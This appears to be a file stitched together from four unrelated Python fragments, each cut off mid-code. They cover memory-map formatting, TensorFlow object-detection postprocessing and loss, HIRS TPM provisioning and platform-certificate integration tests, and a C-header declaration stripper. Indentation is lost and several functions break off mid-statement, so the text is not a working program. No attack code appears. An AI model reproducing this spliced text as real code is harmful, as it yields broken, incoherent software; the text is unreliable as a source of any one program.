def format_permission(region: MemoryRange) -> str:
NBSP = " "
return "".join(
[
"R" if region.readable else NBSP,
"W" if region.writeable else NBSP,
"X" if region.executable else NBSP,
"C" if region.cacheable else NBSP,
"A" if region.atomics else NBSP,
]
)
###########################################################################
#
# Routines to build memory maps (and tables) from Object Model design elements.
#
##############################################################################
class MemoryTable(MemorySectionTable):
"""
Given a group of design elements, construct a memory map table from their memory ranges.
"""
def __init__(
self, title: str, elements: Iterable[Element], reference_id: str, sections: Element = None
):
regions = MemoryMap(*elements)
sectionMap = get_section_map(sections, regions)
super().__init__(title, regions, reference_id, sectionMap)
class MemoryMap(RegionMap):
"""
Build a map of all the memory regions contained in a set of elements.
"""
def __init__(self, *elements: Element):
# Get all the memory regions for the elements and create a Memory map.
regions = [
region
for element in elements
for device in element.query().contains_key("memoryRegions")
for region in getRegions(device)
]
super().__init__(regions)
def getRegions(e: Element) -> Iterable[MemoryRange]:
"""
Given a design element, get the memory regions corresponding to the element.
"""
# For each of the element's memory regions
for region in e.memoryRegions:
# For each contiguous range of the region
for range in getRanges(region):
# Get a description of the memory region.
# If a single region, give priority to the element's name.
# TODO: Let's | |
feature_maps
"""
feature_map_shapes = [
shape_utils.combined_static_and_dynamic_shape(
feature_map) for feature_map in feature_maps
]
return [(shape[1], shape[2]) for shape in feature_map_shapes]
def postprocess(self, prediction_dict):
"""Converts prediction tensors to final detections.
This function converts raw predictions tensors to final detection results by
slicing off the background class, decoding box predictions and applying
non max suppression and clipping to the image window.
See base class for output format conventions. Note also that by default,
scores are to be interpreted as logits, but if a score_conversion_fn is
used, then scores are remapped (and may thus have a different
interpretation).
Args:
prediction_dict: a dictionary holding prediction tensors with
1) box_encodings: 3-D float tensor of shape [batch_size, num_anchors,
box_code_dimension] containing predicted boxes.
2) class_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, num_classes+1] containing class predictions
(logits) for each of the anchors. Note that this tensor *includes*
background class predictions.
Returns:
detections: a dictionary containing the following fields
detection_boxes: [batch, max_detections, 4]
detection_scores: [batch, max_detections]
detection_classes: [batch, max_detections]
detection_keypoints: [batch, max_detections, num_keypoints, 2] (if
encoded in the prediction_dict 'box_encodings')
num_detections: [batch]
Raises:
ValueError: if prediction_dict does not contain `box_encodings` or
`class_predictions_with_background` fields.
"""
if ('box_encodings' not in prediction_dict or
'class_predictions_with_background' not in prediction_dict):
raise ValueError('prediction_dict does not contain expected entries.')
with tf.name_scope('Postprocessor'):
box_encodings = prediction_dict['box_encodings']
class_predictions = prediction_dict['class_predictions_with_background']
detection_boxes, detection_keypoints = self._batch_decode(box_encodings)
detection_boxes = tf.expand_dims(detection_boxes, axis=2)
class_predictions_without_background = tf.slice(class_predictions,
[0, 0, 1],
[-1, -1, -1])
detection_scores = self._score_conversion_fn(
class_predictions_without_background)
clip_window = tf.constant([0, 0, 1, 1], tf.float32)
additional_fields = None
if detection_keypoints is not None:
additional_fields = {
fields.BoxListFields.keypoints: detection_keypoints}
(nmsed_boxes, nmsed_scores, nmsed_classes, _, nmsed_additional_fields,
num_detections) = self._non_max_suppression_fn(
detection_boxes,
detection_scores,
clip_window=clip_window,
additional_fields=additional_fields)
detection_dict = {'detection_boxes': nmsed_boxes,
'detection_scores': nmsed_scores,
'detection_classes': nmsed_classes,
'num_detections': tf.to_float(num_detections)}
if (nmsed_additional_fields is not None and
fields.BoxListFields.keypoints in nmsed_additional_fields):
detection_dict['detection_keypoints'] = nmsed_additional_fields[
fields.BoxListFields.keypoints]
return detection_dict
def loss(self, prediction_dict, scope=None):
"""Compute scalar loss tensors with respect to provided groundtruth.
Calling this function requires that groundtruth tensors have been
provided via the provide_groundtruth function.
Args:
prediction_dict: a dictionary holding prediction tensors with
1) box_encodings: 3-D float tensor of shape [batch_size, num_anchors,
box_code_dimension] containing predicted boxes.
2) class_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, num_classes+1] containing class predictions
(logits) for each of the anchors. Note that this tensor *includes*
background class predictions.
scope: Optional scope name.
Returns:
a dictionary mapping loss keys (`localization_loss` and
`classification_loss`) to scalar tensors representing corresponding loss
values.
"""
with tf.name_scope(scope, 'Loss', prediction_dict.values()):
keypoints = None
if self.groundtruth_has_field(fields.BoxListFields.keypoints):
keypoints = self.groundtruth_lists(fields.BoxListFields.keypoints)
(batch_cls_targets, batch_cls_weights, batch_reg_targets,
batch_reg_weights, match_list) = self._assign_targets(
self.groundtruth_lists(fields.BoxListFields.boxes),
self.groundtruth_lists(fields.BoxListFields.classes),
keypoints)
if self._add_summaries:
self._summarize_input(
self.groundtruth_lists(fields.BoxListFields.boxes), match_list)
num_matches = tf.stack(
[match.num_matched_columns() for match in match_list])
location_losses = self._localization_loss(
prediction_dict['box_encodings'],
batch_reg_targets,
ignore_nan_targets=True,
weights=batch_reg_weights)
# print('skye location_losses=', location_losses)
# print('skye location_losses.shape=', location_losses.shape)
cls_losses = self._classification_loss(
prediction_dict['class_predictions_with_background'],
batch_cls_targets,
weights=batch_cls_weights)
if self._hard_example_miner:
(localization_loss, classification_loss) = self._apply_hard_mining(
location_losses, cls_losses, prediction_dict, match_list)
if self._add_summaries:
self._hard_example_miner.summarize()
else:
if self._add_summaries:
class_ids = tf.argmax(batch_cls_targets, axis=2)
flattened_class_ids = tf.reshape(class_ids, [-1])
flattened_classification_losses = tf.reshape(cls_losses, [-1])
self._summarize_anchor_classification_loss(
flattened_class_ids, flattened_classification_losses)
localization_loss = tf.reduce_sum(location_losses)
classification_loss = tf.reduce_sum(cls_losses)
# Optionally normalize by number of positive matches
normalizer = tf.constant(1.0, dtype=tf.float32)
if self._normalize_loss_by_num_matches:
normalizer = tf.maximum(tf.to_float(tf.reduce_sum(num_matches)), 1.0)
with tf.name_scope('localization_loss'):
localization_loss = ((self._localization_loss_weight / normalizer) *
localization_loss)
with tf.name_scope('classification_loss'):
classification_loss = ((self._classification_loss_weight / normalizer) *
classification_loss)
loss_dict = {
'localization_loss': localization_loss,
'classification_loss': classification_loss
}
return loss_dict
def _summarize_anchor_classification_loss(self, class_ids, cls_losses):
positive_indices = tf.where(tf.greater(class_ids, 0))
positive_anchor_cls_loss = tf.squeeze(
tf.gather(cls_losses, positive_indices), axis=1)
visualization_utils.add_cdf_image_summary(positive_anchor_cls_loss,
'PositiveAnchorLossCDF')
negative_indices = tf.where(tf.equal(class_ids, 0))
negative_anchor_cls_loss = tf.squeeze(
tf.gather(cls_losses, negative_indices), axis=1)
visualization_utils.add_cdf_image_summary(negative_anchor_cls_loss,
'NegativeAnchorLossCDF')
def _assign_targets(self, groundtruth_boxes_list, groundtruth_classes_list,
groundtruth_keypoints_list=None):
"""Assign groundtruth targets.
Adds a background class to each one-hot encoding of groundtruth classes
and uses target assigner to obtain regression and classification targets.
Args:
groundtruth_boxes_list: a list of 2-D tensors of shape [num_boxes, 4]
containing coordinates of the groundtruth boxes.
Groundtruth boxes are provided in [y_min, x_min, y_max, x_max]
format and assumed to be normalized and clipped
relative to the image window with y_min <= y_max and x_min <= x_max.
groundtruth_classes_list: a list of 2-D one-hot (or k-hot) tensors of
shape [num_boxes, num_classes] containing the class targets with the 0th
index assumed to map to the first non-background class.
groundtruth_keypoints_list: (optional) a list of 3-D tensors of shape
[num_boxes, num_keypoints, 2]
Returns:
batch_cls_targets: a tensor with shape [batch_size, num_anchors,
num_classes],
batch_cls_weights: a tensor with shape [batch_size, num_anchors],
batch_reg_targets: a tensor with shape [batch_size, num_anchors,
box_code_dimension]
batch_reg_weights: a tensor with shape [batch_size, num_anchors],
match_list: a list of matcher.Match objects encoding the match between
anchors and groundtruth boxes for each image of the batch,
with rows of the Match objects corresponding to groundtruth boxes
and columns corresponding to anchors.
"""
groundtruth_boxlists = [
box_list.BoxList(boxes) for boxes in groundtruth_boxes_list
]
groundtruth_classes_with_background_list = [
tf.pad(one_hot_encoding, [[0, 0], [1, 0]], mode='CONSTANT')
for one_hot_encoding in groundtruth_classes_list
]
if groundtruth_keypoints_list is not None:
for boxlist, keypoints in zip(
groundtruth_boxlists, groundtruth_keypoints_list):
boxlist.add_field(fields.BoxListFields.keypoints, keypoints)
return target_assigner.batch_assign_targets(
self._target_assigner, self.anchors, groundtruth_boxlists,
groundtruth_classes_with_background_list)
def _summarize_input(self, groundtruth_boxes_list, match_list):
"""Creates tensorflow summaries for the input boxes and anchors.
This function creates four summaries corresponding to the average
number (over images in a batch) of (1) groundtruth boxes, (2) anchors
marked as positive, (3) anchors marked as negative, and (4) anchors marked
as ignored.
Args:
groundtruth_boxes_list: a list of 2-D tensors of shape [num_boxes, 4]
containing corners of the groundtruth boxes.
match_list: a list of matcher.Match objects encoding the match between
anchors and groundtruth boxes for each image of the batch,
with rows of the Match objects corresponding to groundtruth boxes
and columns corresponding to anchors.
"""
num_boxes_per_image = tf.stack(
[tf.shape(x)[0] for x in groundtruth_boxes_list])
pos_anchors_per_image = tf.stack(
[match.num_matched_columns() for match in match_list])
neg_anchors_per_image = tf.stack(
[match.num_unmatched_columns() for match in match_list])
ignored_anchors_per_image = tf.stack(
[match.num_ignored_columns() for match in match_list])
tf.summary.scalar('Input/AvgNumGroundtruthBoxesPerImage',
tf.reduce_mean(tf.to_float(num_boxes_per_image)))
tf.summary.scalar('Input/AvgNumPositiveAnchorsPerImage',
tf.reduce_mean(tf.to_float(pos_anchors_per_image)))
tf.summary.scalar('Input/AvgNumNegativeAnchorsPerImage',
tf.reduce_mean(tf.to_float(neg_anchors_per_image)))
tf.summary.scalar('Input/AvgNumIgnoredAnchorsPerImage',
tf.reduce_mean(tf.to_float(ignored_anchors_per_image)))
def _apply_hard_mining(self, location_losses, cls_losses, prediction_dict,
match_list):
"""Applies hard mining to anchorwise losses.
Args:
location_losses: Float tensor of shape [batch_size, num_anchors]
representing anchorwise location losses.
cls_losses: Float tensor of shape [batch_size, num_anchors]
representing anchorwise classification losses.
prediction_dict: p a dictionary holding prediction tensors with
1) box_encodings: 3-D float tensor of shape [batch_size, num_anchors,
box_code_dimension] containing predicted boxes.
2) class_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, num_classes+1] containing class predictions
(logits) for each of the anchors. Note that this tensor *includes*
background class predictions.
match_list: a list of matcher.Match objects encoding the match between
anchors and groundtruth boxes for each image of the batch,
with rows of the Match objects corresponding to groundtruth boxes
and columns corresponding to anchors.
Returns:
mined_location_loss: a float scalar with sum of localization losses from
selected hard examples.
mined_cls_loss: a float scalar with sum of classification losses from
selected hard examples.
"""
class_predictions = tf.slice(
prediction_dict['class_predictions_with_background'], [0, 0,
1], [-1, -1, -1])
decoded_boxes, _ = self._batch_decode(prediction_dict['box_encodings'])
decoded_box_tensors_list = tf.unstack(decoded_boxes)
class_prediction_list = tf.unstack(class_predictions)
decoded_boxlist_list = []
for box_location, box_score in zip(decoded_box_tensors_list,
class_prediction_list):
decoded_boxlist = box_list.BoxList(box_location)
decoded_boxlist.add_field('scores', box_score)
decoded_boxlist_list.append(decoded_boxlist)
return self._hard_example_miner(
location_losses=location_losses,
cls_losses=cls_losses,
decoded_boxlist_list=decoded_boxlist_list,
match_list=match_list)
def _batch_decode(self, box_encodings):
"""Decodes a batch of box encodings with respect to the anchors.
Args:
box_encodings: A float32 tensor of shape
[batch_size, num_anchors, box_code_size] containing box encodings.
Returns:
decoded_boxes: A float32 tensor of shape
[batch_size, num_anchors, 4] containing the decoded boxes.
decoded_keypoints: A float32 tensor of shape
[batch_size, num_anchors, num_keypoints, 2] containing the decoded
keypoints if present in the input `box_encodings`, None otherwise.
"""
combined_shape = shape_utils.combined_static_and_dynamic_shape(
box_encodings)
batch_size = combined_shape[0]
tiled_anchor_boxes = tf.tile(
tf.expand_dims(self.anchors.get(), 0), [batch_size, 1, 1])
tiled_anchors_boxlist = box_list.BoxList(
tf.reshape(tiled_anchor_boxes, [-1, 4]))
decoded_boxes = self._box_coder.decode(
tf.reshape(box_encodings, [-1, self._box_coder.code_size]),
tiled_anchors_boxlist)
decoded_keypoints = None
if decoded_boxes.has_field(fields.BoxListFields.keypoints):
decoded_keypoints = decoded_boxes.get_field(
fields.BoxListFields.keypoints)
num_keypoints = decoded_keypoints.get_shape()[1]
decoded_keypoints = tf.reshape(
decoded_keypoints,
tf.stack([combined_shape[0], combined_shape[1], num_keypoints, 2]))
decoded_boxes = tf.reshape(decoded_boxes.get(), tf.stack(
[combined_shape[0], combined_shape[1], 4]))
return decoded_boxes, decoded_keypoints
def restore_map(self, from_detection_checkpoint=True):
"""Returns a map of variables to load from a foreign checkpoint.
See parent class for details.
Args:
from_detection_checkpoint: whether to restore from a full detection
checkpoint (with compatible variable names) or to restore from a
classification checkpoint for initialization prior to training.
Returns:
A dict mapping variable names | |
HIRS report and ensure it passes
- Ensure that there are no new alerts
"""
logging.info("***************** Beginning of broad repo successful appraisal test *****************")
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_1_2(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_13_tpm_1_2_initial_provision(self):
"""Test that running the TPM 1.2 hirs provisioner works"""
logging.info("***************** Beginning of initial TPM 1.2 provisioner run *****************")
# Run the provisioner to ensure that it provisions successfully
provisioner_out = run_hirs_provisioner_tpm_1_2(CLIENT)
print("Initial TPM 1.2 provisioner run output: {0}".format(provisioner_out))
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_14_tpm_2_0_initial_provision(self):
"""Test that running the TPM 2.0 hirs provisioner works"""
logging.info("***************** Beginning of initial TPM 2.0 provisioner run *****************")
# Run the provisioner to ensure that it provisions successfully
provisioner_out = run_hirs_provisioner_tpm2(CLIENT)
print("Initial provisioner run output: {0}".format(provisioner_out))
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_15_device_info_report_stored_after_provisioning(self):
"""Test that running the hirs provisioner results in storing a device info report for
the device in the DB"""
logging.info("***************** Beginning of device info report test *****************")
logging.info("Getting devices from ACA portal...")
aca_portal_devices = AcaPortal.get_devices()
self.assertEqual(aca_portal_devices['recordsTotal'], 1)
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_16_supply_chain_validation_summary_stored_after_second_provisioning(self):
"""Test that running the hirs provisioner, a second time, results in storing a supply chain validation
record in the database"""
logging.info("***************** Beginning of supply chain validation summary test *****************")
logging.info("Uploading CA cert: " + CA_CERT_LOCATION)
AcaPortal.upload_ca_cert(CA_CERT_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("Second provisioner run output: {0}".format(provisioner_out))
supply_chain_validation_summaries = AcaPortal.get_supply_chain_validation_summaries()
# verify this is one SCVS record indicating PASS
self.assertEqual(supply_chain_validation_summaries['recordsTotal'], 2)
self.assertEqual(supply_chain_validation_summaries['data'][0]['overallValidationResult'], "PASS")
self.assertEqual(supply_chain_validation_summaries['data'][1]['overallValidationResult'], "PASS")
# verify device has been updated with supply chain appraisal result
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_17_ek_info_report(self):
"""Test that running the hirs provisioner results in storing EK certs info report for
the device in the DB"""
logging.info("***************** Beginning of Endorsement Certs info report test *****************")
logging.info("Getting EK Certs from ACA portal...")
cert_list = AcaPortal.get_ek_certs()
self.assertEqual(cert_list['recordsTotal'], 1)
self.assertEqual(cert_list['data'][0]['credentialType'], "TCPA Trusted Platform Module Endorsement")
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_18_pk_info_report(self):
"""Test that running the hirs provisioner results in storing PK certs info report for
the device in the DB"""
logging.info("***************** Beginning Platform Certs info report test *****************")
logging.info("Getting PK Certs from ACA portal...")
cert_list = AcaPortal.get_pk_certs()
self.assertEqual(cert_list['recordsTotal'], 1)
self.assertEqual(cert_list['data'][0]['credentialType'], "TCG Trusted Platform Endorsement")
@collectors(['TPM'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_19_trust_chain_info_report(self):
"""Test that running the hirs provisioner results in storing trust chains info report for
the device in the DB"""
logging.info("***************** Beginning of Trust Chain info report test *****************")
logging.info("Getting Trust Chains from ACA portal...")
trust_chain_list = AcaPortal.get_trust_chains()
self.assertEqual(trust_chain_list['recordsTotal'], 1)
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A1_base_delta(self):
"""Test Delta Certificates A1 - Provisioning with Good Base Platform Cert (via Platform Cert on TPM Emulator)"""
logging.info("***************** test_20_A1 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform Cert (via Platform Cert on TPM Emulator)")
logging.info("Check if ACA is online...")
AcaPortal.check_is_online()
logging.info("Uploading CA Cert: " + CA_CERT_LOCATION)
AcaPortal.upload_ca_cert(CA_CERT_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A1_base_delta run output: {0}".format(provisioner_out))
# Verify device supply chain appraisal result is PASS
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A2_base_delta(self):
"""Test Delta Certificates A2 - Attempt to upload Base cert with holder already having a Base Platform Cert associated with it"""
logging.info("***************** test_20_A2 - Beginning of delta certificate test *****************")
logging.info("Attempt to upload PBaseCertB, with PBaseCertA already loaded in the ACA.")
print("test_20_A2_base_delta. PBaseCertA has already been loaded. Attempting to upload second Platform Cert: %s" % (PBaseCertB_LOCATION))
# Confirm there is one Platform Base Cert already loaded
cert_list = AcaPortal.get_pk_certs()
self.assertEqual(cert_list['recordsTotal'], 1)
print("Number of Platform Certs: %d" % (cert_list['recordsTotal']))
self.assertEqual(cert_list['data'][0]['credentialType'], "TCG Trusted Platform Endorsement")
self.assertEqual(cert_list['data'][0]['platformType'], "Base")
# Try uploading a second Platform Base Cert
print("Attempting to upload a second Platform Base Cert...")
AcaPortal.upload_pk_cert(PBaseCertB_LOCATION)
# Confirm Platform Base Cert has not been loaded
cert_list = AcaPortal.get_pk_certs()
self.assertEqual(cert_list['recordsTotal'], 1)
print("Number of Platform Certs: %d" % (cert_list['recordsTotal']))
self.assertEqual(cert_list['data'][0]['credentialType'], "TCG Trusted Platform Endorsement")
self.assertEqual(cert_list['data'][0]['platformType'], "Base")
if (cert_list['recordsTotal'] == 1):
print ("SUCCESS.\n")
else:
print ("FAILED.\n")
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A3_base_delta(self):
"""Test Delta Certificates A3 - Provisioning with Good Base Platform Cert Base and 1 Delta Cert"""
logging.info("***************** test_20_A3 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform Cert Base and 1 Delta Cert")
# Verify device supply chain appraisal result is PASS
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
# Upload the SIDeltaCertA1 and provision
AcaPortal.upload_pk_cert(SIDeltaCertA1_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A3_base_delta run output: {0}".format(provisioner_out))
supply_chain_validation_summaries = AcaPortal.get_supply_chain_validation_summaries()
# Verify this is one SCVS record indicating PASS
self.assertEqual(supply_chain_validation_summaries['recordsTotal'], 2)
self.assertEqual(supply_chain_validation_summaries['data'][0]['overallValidationResult'], "PASS")
self.assertEqual(supply_chain_validation_summaries['data'][1]['overallValidationResult'], "PASS")
# Verify device has been updated with supply chain appraisal result
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A4_base_delta(self):
"""Test Delta Certificates A4 - Provisioning with Good Base Platform Cert Base and 2 Delta Certs"""
logging.info("***************** test_20_A4 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform Cert Base and 2 Delta Certs")
# Verify device supply chain appraisal result is PASS
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
# Upload the VARDeltaCertA1 and provision
AcaPortal.upload_pk_cert(VARDeltaCertA1_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A4_base_delta run output: {0}".format(provisioner_out))
supply_chain_validation_summaries = AcaPortal.get_supply_chain_validation_summaries()
# Verify this is one SCVS record indicating PASS
self.assertEqual(supply_chain_validation_summaries['recordsTotal'], 3)
self.assertEqual(supply_chain_validation_summaries['data'][0]['overallValidationResult'], "PASS")
self.assertEqual(supply_chain_validation_summaries['data'][1]['overallValidationResult'], "PASS")
self.assertEqual(supply_chain_validation_summaries['data'][2]['overallValidationResult'], "PASS")
# Verify device has been updated with supply chain appraisal result
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A5_base_delta(self):
"""Test Delta Certificates A5 - Provisioning with Good Base Platform Cert and 1 Bad Delta Cert"""
logging.info("***************** test_20_A5 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform Cert and 1 Bad Delta Cert")
# TODO: Determine if we need this test
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A6_base_delta(self):
"""Test Delta Certificates A6 - Provisioning with Good Base Platform, 2 Good Delta Certs and 1 Bad Delta Cert"""
logging.info("***************** test_20_A6 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform, 2 Good Delta Certs and 1 Bad Delta Cert")
# Verify device supply chain appraisal result is PASS
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
# Upload the SIDeltaCertA2 and provision
AcaPortal.upload_pk_cert(SIDeltaCertA2_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A6_base_delta SHOULD FAIL provisioning using: %s" % (SIDeltaCertA2_LOCATION))
print("test_20_A6_base_delta run output: {0}".format(provisioner_out))
# Provisioning should fail since the Delta contains a bad component.
self.assertIn("Provisioning failed", format(provisioner_out))
# Upload the SIDeltaCertA2_resolved and provision
AcaPortal.upload_pk_cert(SIDeltaCertA2_resolved_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A6_base_delta SHOULD PASS provisioning using: %s" % (SIDeltaCertA2_resolved_LOCATION))
print("test_20_A6_base_delta run output: {0}".format(provisioner_out))
# Verify device has been updated with supply chain appraisal result
devices = AcaPortal.get_devices()
self.assertEqual(devices['data'][0]['device']['supplyChainStatus'], "PASS")
@collectors(['BASE_DELTA_GOOD'], COLLECTOR_LIST)
@unittest.skipIf(not is_tpm_2_0(TPM_VERSION), "Skipping this test due to TPM Version " + TPM_VERSION)
def test_20_A7_base_delta(self):
"""Test Delta Certificates A7 - Provisioning with Good Base Platform, 2 Good Delta Certs and
1 Bad Delta Cert with non present component"""
logging.info("***************** test_20_A7 - Beginning of delta certificate test *****************")
logging.info("Provisioning with Good Base Platform, 2 Good Delta Certs and 1 Bad Delta Cert with non present component")
# Upload the VARDeltaCertA2 and provision
AcaPortal.upload_pk_cert(VARDeltaCertA2_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A7_base_delta SHOULD FAIL provisioning using: %s" % (VARDeltaCertA2_LOCATION))
print("test_20_A7_base_delta run output: {0}".format(provisioner_out))
# Provisioning should fail since the Delta contains a component thats not in the Base
self.assertIn("Provisioning failed", format(provisioner_out))
# Upload the VARDeltaCertA2_resolved and provision
AcaPortal.upload_pk_cert(VARDeltaCertA2_resolved_LOCATION)
AcaPortal.enable_supply_chain_validations()
provisioner_out = run_hirs_provisioner_tpm_2_0(CLIENT)
print("test_20_A7_base_delta SHOULD PASS provisioning using: %s" % (VARDeltaCertA2_resolved_LOCATION))
print("test_20_A7_base_delta run output: {0}".format(provisioner_out))
# Verify device has been updated with supply chain appraisal result
devices = | |
that confuses the algorithm
# for finding th end of the structure. Or if there is another
# structure definition embedded in the structure.
i = 0
while i < num_tokens - 2:
if (b.tokens[i].kind != TokenKind.KEYWORD or
b.tokens[i].id != "struct"):
i += 1
continue
if (b.tokens[i + 1].kind == TokenKind.IDENTIFIER and
b.tokens[i + 2].kind == TokenKind.PUNCTUATION and
b.tokens[i + 2].id == "{" and b.tokens[i + 1].id in structs):
# Search forward for the end of the structure.
# Very simple search, look for } and ; tokens. If something
# more complicated is needed we can add it later.
j = i + 3
while j < num_tokens - 1:
if (b.tokens[j].kind == TokenKind.PUNCTUATION and
b.tokens[j].id == "}" and
b.tokens[j + 1].kind == TokenKind.PUNCTUATION and
b.tokens[j + 1].id == ";"):
b.tokens = b.tokens[0:i] + b.tokens[j + 2:num_tokens]
num_tokens = len(b.tokens)
j = i
break
j += 1
i = j
continue
i += 1
def optimizeAll(self, macros):
self.optimizeMacros(macros)
self.optimizeIf01()
return
def findIncludes(self):
"""Return the list of included files in a BlockList."""
result = []
for b in self.blocks:
i = b.isInclude()
if i:
result.append(i)
return result
def write(self, out):
indent = 0
for b in self.blocks:
indent = b.write(out, indent)
def removeVarsAndFuncs(self, keep):
"""Remove variable and function declarations.
All extern and static declarations corresponding to variable and
function declarations are removed. We only accept typedefs and
enum/structs/union declarations.
In addition, remove any macros expanding in the headers. Usually,
these macros are static inline functions, which is why they are
removed.
However, we keep the definitions corresponding to the set of known
static inline functions in the set 'keep', which is useful
for optimized byteorder swap functions and stuff like that.
"""
# state = NORMAL => normal (i.e. LN + spaces)
# state = OTHER_DECL => typedef/struct encountered, ends with ";"
# state = VAR_DECL => var declaration encountered, ends with ";"
# state = FUNC_DECL => func declaration encountered, ends with "}"
NORMAL = 0
OTHER_DECL = 1
VAR_DECL = 2
FUNC_DECL = 3
state = NORMAL
depth = 0
blocksToKeep = []
blocksInProgress = []
blocksOfDirectives = []
ident = ""
state_token = ""
macros = set()
for block in self.blocks:
if block.isDirective():
# Record all macros.
if block.directive == 'define':
macro_name = block.define_id
paren_index = macro_name.find('(')
if paren_index == -1:
macros.add(macro_name)
else:
macros.add(macro_name[0:paren_index])
blocksInProgress.append(block)
# If this is in a function/variable declaration, we might need
# to emit the directives alone, so save them separately.
blocksOfDirectives.append(block)
continue
numTokens = len(block.tokens)
lastTerminatorIndex = 0
i = 0
while i < numTokens:
token_id = block.tokens[i].id
terminator = False
if token_id == '{':
depth += 1
if (i >= 2 and block.tokens[i-2].id == 'extern' and
block.tokens[i-1].id == '"C"'):
# For an extern "C" { pretend as though this is depth 0.
depth -= 1
elif token_id == '}':
if depth > 0:
depth -= 1
if depth == 0:
if state == OTHER_DECL:
# Loop through until we hit the ';'
i += 1
while i < numTokens:
if block.tokens[i].id == ';':
token_id = ';'
break
i += 1
# If we didn't hit the ';', just consider this the
# terminator any way.
terminator = True
elif depth == 0:
if token_id == ';':
if state == NORMAL:
blocksToKeep.extend(blocksInProgress)
blocksInProgress = []
blocksOfDirectives = []
state = FUNC_DECL
terminator = True
elif (state == NORMAL and token_id == '(' and i >= 1 and
block.tokens[i-1].kind == TokenKind.IDENTIFIER and
block.tokens[i-1].id in macros):
# This is a plain macro being expanded in the header
# which needs to be removed.
blocksToKeep.extend(blocksInProgress)
if lastTerminatorIndex < i - 1:
blocksToKeep.append(Block(block.tokens[lastTerminatorIndex:i-1]))
blocksInProgress = []
blocksOfDirectives = []
# Skip until we see the terminating ')'
i += 1
paren_depth = 1
while i < numTokens:
if block.tokens[i].id == ')':
paren_depth -= 1
if paren_depth == 0:
break
elif block.tokens[i].id == '(':
paren_depth += 1
i += 1
lastTerminatorIndex = i + 1
elif (state != FUNC_DECL and token_id == '(' and
state_token != 'typedef'):
blocksToKeep.extend(blocksInProgress)
blocksInProgress = []
blocksOfDirectives = []
state = VAR_DECL
elif state == NORMAL and token_id in ['struct', 'typedef',
'enum', 'union',
'__extension__']:
state = OTHER_DECL
state_token = token_id
elif block.tokens[i].kind == TokenKind.IDENTIFIER:
if state != VAR_DECL or ident == "":
ident = token_id
if terminator:
if state != VAR_DECL and state != FUNC_DECL or ident in keep:
blocksInProgress.append(Block(block.tokens[lastTerminatorIndex:i+1]))
